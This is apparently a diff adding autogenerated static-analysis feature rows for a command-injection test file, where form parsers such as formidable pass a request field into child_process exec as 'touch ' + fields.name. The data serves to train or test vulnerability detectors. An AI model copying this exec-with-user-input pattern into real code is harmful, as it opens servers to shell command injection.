+| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | stringConcatenatedWith | -endpoint- fields.name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:31 | "touch ... ds.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:26 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:26 | fields | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:26 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:26 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:26 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:21:36:31 | fields.name | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:28:36:31 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:28:36:31 | name | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:28:36:31 | name | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:28:36:31 | name | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:28:36:31 | name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:11 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:11 | form2 | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:11 | form2 | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:11 | form2 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:11 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 = ... gForm() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 = ... gForm() | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 = ... gForm() | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 = ... gForm() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:7:39:43 | form2 = ... gForm() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | exceptional return of new for ... gForm() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | exceptional return of new for ... gForm() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | exceptional return of new for ... gForm() | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | exceptional return of new for ... gForm() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | exceptional return of new for ... gForm() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | new for ... gForm() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | new for ... gForm() | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | new for ... gForm() | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | new for ... gForm() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:15:39:43 | new for ... gForm() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:28 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:28 | formidable | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:28 | formidable | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:28 | formidable | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:28 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:41 | formida ... ingForm | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:41 | formida ... ingForm | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:41 | formida ... ingForm | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:41 | formida ... ingForm | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:19:39:41 | formida ... ingForm | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:30:39:41 | IncomingForm | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:30:39:41 | IncomingForm | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:30:39:41 | IncomingForm | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:30:39:41 | IncomingForm | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:39:30:39:41 | IncomingForm | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:7 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:7 | form2 | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:7 | form2 | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:7 | form2 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:7 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:13 | form2.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:13 | form2.parse | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:13 | form2.parse | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:13 | form2.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:40:13 | form2.parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | exceptional return of form2.p ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | exceptional return of form2.p ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | exceptional return of form2.p ... OK\\n }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | exceptional return of form2.p ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | exceptional return of form2.p ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:9:40:13 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:9:40:13 | parse | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:9:40:13 | parse | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:9:40:13 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:9:40:13 | parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | CalleeFlexibleAccessPath | form2.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:15:40:17 | req | receiverName | form2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:40:19 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:40:19 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:40:19 | exec | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:40:19 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:40:19 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | CalleeFlexibleAccessPath | form2.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | (err, f ... OK\\n } | receiverName | form2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | exceptional return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:20:42:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:21:40:23 | err | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:21:40:23 | err | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:21:40:23 | err | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:21:40:23 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:21:40:23 | err | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:26:40:31 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:34:40:38 | files | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:34:40:38 | files | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:34:40:38 | files | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:34:40:38 | files | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:34:40:38 | files | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:8 | exec | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:8 | exec | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:8 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exceptional return of exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exceptional return of exec("t ... s.name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exceptional return of exec("t ... s.name) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exceptional return of exec("t ... s.name) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exceptional return of exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:17 | "touch " | stringConcatenatedWith | -endpoint- fields.name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:10:41:31 | "touch ... ds.name | calleeImports | child_process | +| 